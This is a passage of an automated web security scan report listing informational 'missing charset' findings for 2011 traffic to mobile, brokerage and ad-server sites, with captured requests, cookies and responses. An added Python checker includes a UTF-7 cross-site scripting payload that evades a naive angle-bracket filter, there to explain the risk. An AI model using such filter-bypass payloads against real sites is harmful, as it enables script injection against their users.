User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:27:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 53168


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...

23.30. https://www.frontiermobile.com/data/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.frontiermobile.com
Path:   /data/

Request

GET /data/ HTTP/1.1
Host: www.frontiermobile.com
Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da933aCMYKM; ASPSESSIONIDSATQTBDS=GGODMNPCPECFKPDLNFBJFLCO

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:51:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 20676


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   FrontierMobil
...[SNIP]...

23.31. https://www.frontiermobile.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.frontiermobile.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.frontiermobile.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc7da933aCMYKM; ASPSESSIONIDSATQTBDS=GGODMNPCPECFKPDLNFBJFLCO; ASP.NET_SessionId=bcv1oo45gbysf4jskjggz355; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:51:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 15216


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   FrontierMobil
...[SNIP]...

23.32. https://www.optionshouse.com/tool/2011.09.01.19.07/app/accountSignup/page/createLogin.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.optionshouse.com
Path:   /tool/2011.09.01.19.07/app/accountSignup/page/createLogin.jsp

Request

GET /tool/2011.09.01.19.07/app/accountSignup/page/createLogin.jsp HTTP/1.1
Host: www.optionshouse.com
Connection: keep-alive
Referer: http://landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/?utm_source=yhofin&utm_medium=paid-banner-ads&utm_campaign=120x60-QuotesBttn&utm_content=stock:oldGrnBlk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LiveBall=uid=699982&uky=G2W1TS8H&rid=764602

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 06 Sep 2011 12:49:02 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 19900


<!DOCTYPE html
   PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
...[SNIP]...

24. HTML does not specify charset
There are 32 instances of this issue:

Issue description

If a web response declares HTML content but does not specify a character set, the browser has to choose one itself. With no byte-order mark and no charset in the Content-Type header, it looks for a <meta> charset declaration in the first 1024 bytes of the document and otherwise falls back to heuristic sniffing of the bytes, or to its locale default. Even if the bulk of the HTML is in a standard encoding such as UTF-8, a run of unusual bytes anywhere in the response, including bytes the attacker supplied, can steer that guess towards a different encoding. This can have unexpected results, and it has historically led to cross-site scripting in which a non-standard encoding such as UTF-7 defeats the application's output filters: the byte sequence +ADw- contains no angle bracket, so a filter that rejects < lets it through, yet a client decoding the page as UTF-7 renders it as <. Current browsers no longer implement UTF-7 (the HTML Standard forbids supporting it), so that particular vector is confined to legacy clients, but a missing charset still leaves the interpretation of every byte in the page to the client's guess.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains only static content. Review the contents of the response and the context in which it appears, and in particular whether any request-supplied data is reflected into it, to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-Type header a directive specifying a standard recognised character set, preferably charset=utf-8 (charset=ISO-8859-1 is also acceptable provided the bytes really are encoded that way). The header value takes precedence over any <meta> declaration in the body, so it is the one to set; a matching <meta charset> within the first 1024 bytes is a useful addition for documents that may be saved or served without their headers. The captures in this section show both cases: the ASP.NET responses send text/html; charset=utf-8, whereas the DCLK-AdSvr responses send a bare text/html.
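The check below is an added example and not part of the original scan report or of any scanner's code: it parses raw HTTP responses of the kind captured in this section and reports which ones leave charset selection to browser sniffing, then shows why that matters by decoding a UTF-7 byte string that a naive angle-bracket filter would pass. The sample responses are constructed for the example (modelled on the captures above, with headers abbreviated), and all function names are ours.

```python
"""Flag HTML responses whose Content-Type header omits a charset.

Added example, not part of the original XSS.Cx/Burp report. The sample
responses are constructed for this example (modelled on the captures in
this section, with headers abbreviated); all function names are ours.
"""
import re
from email.message import Message

# Constructed samples: an ad-server style response with a bare text/html,
# an ASP.NET style response with charset in the header, a response that
# declares the charset only in a <meta> tag, and a non-HTML response.
SAMPLES = {
    "bare_text_html": (
        "HTTP/1.1 200 OK\r\n"
        "Server: DCLK-AdSvr\r\n"
        "Content-Type: text/html\r\n"
        "\r\n"
        "<html><head><title>Advertisement</title></head><body></body></html>"
    ),
    "header_charset": (
        "HTTP/1.1 200 OK\r\n"
        "Server: Microsoft-IIS/6.0\r\n"
        "Content-Type: text/html; charset=utf-8\r\n"
        "\r\n"
        "<html><head><title>ok</title></head></html>"
    ),
    "meta_only": (
        "HTTP/1.1 200 OK\r\n"
        "Content-Type: text/html\r\n"
        "\r\n"
        '<html><head><meta http-equiv="Content-Type" '
        'content="text/html; charset=ISO-8859-1"><title>x</title></head></html>'
    ),
    "json": (
        "HTTP/1.1 200 OK\r\n"
        "Content-Type: application/json; charset=utf-8\r\n"
        "\r\n"
        '""'
    ),
}

# Matches <meta charset=...> and <meta http-equiv ... content="...; charset=...">
META_CHARSET = re.compile(
    r"<meta[^>]*?charset\s*=\s*[\"']?\s*([A-Za-z0-9_.:-]+)", re.IGNORECASE
)

NO_CHARSET = "HTML does not specify charset"
META_ONLY = "charset declared only in <meta>; also set it in the Content-Type header"


def split_response(raw):
    """Split a raw HTTP/1.1 response into (status line, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = Message()  # gives us RFC 2045 parameter parsing for free
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return lines[0], headers, body


def meta_charset(body):
    """Charset from a <meta> tag inside the 1024-byte window browsers prescan."""
    m = META_CHARSET.search(body[:1024])
    return m.group(1).lower() if m else None


def check(raw):
    """Describe whether the response leaves charset selection to sniffing."""
    _, headers, body = split_response(raw)
    mime = headers.get_content_type()  # lowercased "type/subtype"
    result = {
        "html": mime == "text/html",
        "header_charset": headers.get_param("charset"),
        "meta_charset": meta_charset(body),
        "finding": None,
    }
    if not result["html"]:
        return result
    if result["header_charset"] is None:
        result["finding"] = META_ONLY if result["meta_charset"] else NO_CHARSET
    return result


# Why the missing charset matters: a filter that only rejects literal angle
# brackets passes this byte string, but a client that decodes the response
# as UTF-7 turns it into a script tag. Current browsers no longer implement
# UTF-7, so this is the legacy-client case the issue text refers to.
UTF7_PAYLOAD = b"+ADw-script+AD4-alert(1)+ADw-/script+AD4-"


def naive_filter_blocks(raw_bytes):
    """Reject only literal '<' and '>' bytes, like many 2011-era filters."""
    return b"<" in raw_bytes or b">" in raw_bytes


def decode_as_utf7(raw_bytes):
    """What a UTF-7-sniffing client would render for the same bytes."""
    return raw_bytes.decode("utf-7")


if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(f"{name:15} -> {check(raw)['finding']}")
    print("filter blocks payload:", naive_filter_blocks(UTF7_PAYLOAD))
    print("decoded as UTF-7:     ", decode_as_utf7(UTF7_PAYLOAD))
```

Running it over the constructed samples reports the bare text/html response as the NO_CHARSET finding, the response with charset only in <meta> as the weaker META_ONLY finding, and nothing for the response that sets charset=utf-8 in the header or for the JSON response. The UTF-7 part shows the filter-bypass mechanism in isolation: the payload bytes contain no angle brackets, so naive_filter_blocks returns False, while decode_as_utf7 yields a complete script element. Feeding it the response bodies from this report would require them unsnipped, which the page does not provide.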


24.1. http://ad.doubleclick.net/adi/N2434.Yahoo/B5625836.2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2434.Yahoo/B5625836.2

Request

GET /adi/N2434.Yahoo/B5625836.2;sz=300x250;dcopt=rcl;mtfIFPath=nofile;click=http://ads.bluelithium.com/clk?3,eAGlUE1zokAQ.TN72jLMJzNDqDmMiMSEUTEkxr2kQBDDhxCkYsivXxLdVO7bl.f6Vfd71Y2IbVIUp-kuiayEMhabNiKYpDGniG1H0LZtQpDFMMcjDd3DeHfceMFEvzaF-qob.nYbnKnKPnF2bpbiEyfOFPfOWVFTrt8v9D9h3EcnffEY8r5ylYpdjyzz2fjb3Hsw5x8B1eE899cBXUx0p8NpqR046Nm7H27pnzApdPhYzbGmm9P3phztu665BiAr6zgqjahNjD7a17WxrStwP.MkMo8Rs5qaAC254IIQA1EqGBR0IMMLLQQNhE3TGhowkVFZVv2uBfeSMMgIxpRd-yvXARu5UTeLBXCflhIRZA7fJoIDX7YPTqasXKRvT41aNXlYGqc8KLTeJzwqzMrNj0q9rDkYyzRfW8tuGC3FFbi92GAkOLEswkxwJw-v5fNj6Baw9TP2nJ7uAgi9ACjJsKCMWGAlIfj969.Zu7Y-dC9pa1T9j7v.AitxnlY=,;ord=1315312189? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?M0EnBfsYGQDMqpkAAAAAAH7vJQAAAAAAAgAAAAIAAAAAAP8AAAADCF2yCAAAAAAAF7MxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAByawMAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAMDEXZPBPwAAAAAAAAAAAADAxF2T0T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADyM7pcvfauCpvklJWDGZaJ844CyDZSBbQYVKfLAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15sa69po3%2FM%3D787833.14486084.14323910.12559432%2FD%3Dallmyfr%2FS%3D360632246%3ALREC%2FY%3DYAHOO%2FEXP%3D1315319387%2FL%3DrUCgA9j8evXpARpjTl.wjQkMMhd7ak5mEjsAAiW7%2FB%3DejW9Ptj8el8-%2FJ%3D1315312187399365%2FK%3Dnql_VTEk0rLg6_ewKQ00GQ%2FA%3D6284639%2FR%3D0%2F%2A%24,http%3A%2F%2Ffrontier.my.yahoo.com%2F,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14486084%26Z%3D300x250%26_PVID%3DrUCgA9j8evXpARpjTl.wjQkMMhd7ak5mEjsAAiW7%26_salt%3D1505089003%26cb%3D1315312187399365%26i%3D224114%26r%3D0,e974813c-d883-11e0-9781-78e7d15f7c8c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7409
Date: Tue, 06 Sep 2011 12:29:50 GMT

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Aug 15 11:16:49 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...

24.2. http://ad.doubleclick.net/adi/N3220.aod-invite.comOX15921/B5642080.11

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.aod-invite.comOX15921/B5642080.11

Request

GET /adi/N3220.aod-invite.comOX15921/B5642080.11;sz=728x90;pc=[TPAS_ID];click=http://t.invitemedia.com/track_click?auctionID=13153130941610984-126548&campID=106300&crID=126548&pubICode=2145116&pub=24284&partnerID=77&redirectURL=;ord=1315313094? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XKUDAOiUGABiUZgAAAAAAAnhJQAAAAAAAgAAAAYAAAAAAP8AAAADCOQEHgAAAAAAXLsgAAAAAABfoTEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAwAAAAAAFK5H4XoUBkAUrkfhehQGQBSuR-F6FAZAFK5H4XoUBkAUrkfhehQGQBSuR-F6FAZAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC-1vKFRPquCrnRbevBKa2aOyXC53U8C3Yzkg4BAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15jnbi3cd%2FM%3D787833.14445127.14291894.22%2FD%3Dsports%2FS%3D2022092242%3AN%2F_ylt%3DAq9E8pK_YqzvgGRT6l1fMpDSrYZ4%2FY%3DYAHOO%2FEXP%3D1315320284%2FL%3DF8DhwmKIPE7pARpjTl.wjQIRMhd7ak5mFbwADIEZ%2FB%3DFBSePtj8fcY-%2FJ%3D1315313084968840%2FK%3DtHb_lv57MAgihszSpmJhkw%2FA%3D6261245%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2Fnfl%2Fblog%2Fshutdown_corner%2Fpost%2Ftiki-barber-remains-unemployed-and-sad%3Furn%3Dnfl-wp6443,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445127%26Z%3D728x90%26_PVID%3DF8DhwmKIPE7pARpjTl.wjQIRMhd7ak5mFbwADIEZ%26_salt%3D2271271428%26cb%3D1315313084968840%26i%3D140509%26r%3D0,04162e62-d886-11e0-b0bb-78e7d1fa057c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6162
Date: Tue, 06 Sep 2011 12:44:58 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...

24.3. http://ad.doubleclick.net/adi/N3220.aod-invite.comOX15921/B5642080.12

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.aod-invite.comOX15921/B5642080.12

Request

GET /adi/N3220.aod-invite.comOX15921/B5642080.12;sz=300x250;pc=[TPAS_ID];click=http://t.invitemedia.com/track_click?auctionID=13153133591610994-126547&campID=106300&crID=126547&pubICode=2145139&pub=24272&partnerID=77&redirectURL=;ord=1315313359? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?VqUDAPKUGABlUZgAAAAAAAnhJQAAAAAAAgAEAAIAAAAAAP8AAAADCN0EHgAAAAAAc7sgAAAAAABfoTEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC1JAIAAAAAAAIAAwAAAAAAFK5H4XoUBkAUrkfhehQGQBSuR-F6FAZAFK5H4XoUBkAUrkfhehQGQBSuR-F6FAZAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJYpIaTfuuCpzSNjBmAwIi1JX6s2W-oVD3HxaZAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p035eiu%2FM%3D787833.14445103.14291869.1659633%2FD%3Dmaps%2FS%3D2022332404%3ALREC%2FY%3DYAHOO%2FEXP%3D1315320555%2FL%3Dvf1TJGKIKoTpARpjTl.wjRRUMhd7ak5mFssACRdk%2FB%3Du0uOQmKJiUo-%2FJ%3D1315313355644217%2FK%3DwAUe6WLorFCi06uKuG03Mw%2FA%3D6261227%2FR%3D0%2F%2A%24,http%3A%2F%2Fmaps.yahoo.com%2Fdarla_fc%3Fcb%3Dyahoo.ads.darla._loaded%26p%3Dmaps%26f%3D2022332404%26l%3Dlrec%26en%3Dutf-8%26rn%3D1315331355624%26em%3D%257b%2522site-attribute%2522%253a%2522content%253dno_expandable%253bajax_cert_expandable%2522%252c%2522ad,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445103%26Z%3D300x250%26_PVID%3Dvf1TJGKIKoTpARpjTl.wjRRUMhd7ak5mFssACRdk%26_salt%3D3929728865%26cb%3D1315313355644217%26i%3D140469%26r%3D0,a1842154-d886-11e0-9de6-78e7d15f4cd0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6171
Date: Tue, 06 Sep 2011 12:49:19 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...

24.4. http://ad.doubleclick.net/adi/N3285.casalemedia/B2343920.396

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.casalemedia/B2343920.396

Request

GET /adi/N3285.casalemedia/B2343920.396;sz=300x250;click0=http://c.casalemedia.com/c/4/1/80254/;ord=2556211177 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_119282623;dc_seed=;tile=2;dcopt=ist;sz=300x250;ord=278143426403403.28?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4225
Date: Tue, 06 Sep 2011 12:50:51 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...

24.5. http://ad.doubleclick.net/adi/N3285.casalemedia/B2343920.400

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.casalemedia/B2343920.400

Request

GET /adi/N3285.casalemedia/B2343920.400;sz=728x90;click0=http://c.casalemedia.com/c/2/1/80254/;ord=2556211545 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://udmserve.net/udm/img.fetch?sid=2900;tid=1;ev=1;dt=1;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4231
Date: Tue, 06 Sep 2011 12:50:53 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...

24.6. http://ad.doubleclick.net/adi/N3340.dedicatedmedia.com/B5641952.2

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3340.dedicatedmedia.com/B5641952.2

Request

GET /adi/N3340.dedicatedmedia.com/B5641952.2;sz=300x250;pc=[TPAS_ID];click0=http://ib.adnxs.com/click?AAAAAAAACEAAAAAAAAAIQAAAAEA3CRVAAAAAAAAACEAAAAAAAAAIQHpNKG9SeSsU___________tFWZOAAAAAAeaCABVAgAAVQIAAAIAAACSQQcA-lUAAAEAAABVU0QAVVNEACwB-gByAwAABQ4AAgMCAQUAAAAAIxWhkwAAAAA./cnd=!qQQLJgi6uwcQkoMdGPqrASAE/referrer=http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fober.frontier%2Fproduct_undefined%3Bdc_seed%3D%3Btile%3D2%3Bdcopt%3Dist%3Bsz%3D300x250%3Bord%3D8383746361359954%3F/clickenc=http%3A%2F%2Foptimized-by.rubiconproject.com%2Ft%2F6348%2F9844%2F16043-15.3218925.3243961%3Furl%3D;ord=1315313133? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/ober.frontier/product_undefined;dc_seed=;tile=2;dcopt=ist;sz=300x250;ord=8383746361359954?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7753
Date: Tue, 06 Sep 2011 12:45:35 GMT

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Wed May 11 15:28:01 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.j
...[SNIP]...

24.7. http://ad.doubleclick.net/adi/N3382.Yahoo/B5116950.101

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3382.Yahoo/B5116950.101

Request

GET /adi/N3382.Yahoo/B5116950.101;sz=200x33;pc=[TPAS_ID];dcopt=rcl;mtfIFPath=nofile;click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bTBjcDlwayhnaWQkajkyeVUwUERram5wQVJwalRsLndqUUFQTWhkN2FrNW1GY1VBQXF5aixzdCQxMzE1MzEzMDkzMjQ5MDY1LHNpJDQ0NTEwNTEsdiQxLjAsYWlkJGZGYk9uMFBEbjJrLSxjdCQyNSx5YngkeHVib0hhUEoyNm5oNFVHREVxT1hWQSxyJDAscmQkMTZpNjM3OWc2KSk/1/*http://global.ard.yahoo.com/SIG=15eqne3u1/M=999999.999999.999999.999999/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1315320293/L=j92yU0PDkjnpARpjTl.wjQAPMhd7ak5mFcUAAqyj/B=fFbOn0PDn2k-/J=1315313093313787/K=NgNqbTU98ZoHkdL.F35lww/A=3686340584831398191/R=0/X=6/*;mtfIFrameRequest=false;ord=1315313093.313787? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 938
Date: Tue, 06 Sep 2011 12:44:58 GMT

<a target="_blank" href="http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bTBjcDlwayhnaWQkajkyeVUwUERram5wQVJwalRsLndqUUFQTWhkN2FrNW1GY1VBQXF5aixzdCQxMzE1MzEzMDkzMjQ5MDY1LHNpJDQ0NTEwNTEsdi
...[SNIP]...

24.8. http://ad.doubleclick.net/adi/N3382.Yahoo/B5116950.102

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3382.Yahoo/B5116950.102

Request

GET /adi/N3382.Yahoo/B5116950.102;sz=120x30;pc=[TPAS_ID];dcopt=rcl;mtfIFPath=nofile;click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bXQxM2U3ZyhnaWQkajkyeVUwUERram5wQVJwalRsLndqUUFQTWhkN2FrNW1GY1VBQXF5aixzdCQxMzE1MzEzMDkzMjQ5MDY1LHNpJDQ0NTEwNTEsdiQxLjAsYWlkJElGUE5uMFBEbjJrLSxjdCQyNSx5YngkeHVib0hhUEoyNm5oNFVHREVxT1hWQSxyJDAscmQkMTZpdGVhY29uKSk/1/*http://global.ard.yahoo.com/SIG=15em73716/M=999999.999999.999999.999999/D=fin/S=7037371:T1/Y=YAHOO/EXP=1315320293/L=j92yU0PDkjnpARpjTl.wjQAPMhd7ak5mFcUAAqyj/B=IFPNn0PDn2k-/J=1315313093313052/K=NgNqbTU98ZoHkdL.F35lww/A=3686344879798615672/R=0/X=6/*;mtfIFrameRequest=false;ord=1315313093.313052? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 936
Date: Tue, 06 Sep 2011 12:44:58 GMT

<a target="_blank" href="http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0bXQxM2U3ZyhnaWQkajkyeVUwUERram5wQVJwalRsLndqUUFQTWhkN2FrNW1GY1VBQXF5aixzdCQxMzE1MzEzMDkzMjQ5MDY1LHNpJDQ0NTEwNTEsdi
...[SNIP]...

24.9. http://ad.doubleclick.net/adi/ober.frontier/$%7BSEG_IDS%7D

Summary

Severity:   Information
Confidence:   Certain
